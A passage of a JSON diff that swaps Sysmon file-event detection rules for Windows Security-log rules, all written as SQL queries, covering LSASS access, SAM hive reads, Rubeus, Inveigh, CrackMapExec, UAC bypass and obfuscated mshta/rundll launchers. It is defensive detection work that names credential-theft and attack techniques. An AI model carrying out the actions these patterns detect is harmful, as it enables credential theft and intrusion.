], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": 
"ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious 
Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": 
"file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR 
(Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' 
ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1036.005", - "attack.defense_evasion" + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - 
"filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation 
logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE 
'\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": 
"win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": 
"b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": 
"caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. 
This folder should always be inspected to make sure that all the files in there are legitimate" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Software installation ISO files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs 
WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "status": "experimental", + "description": 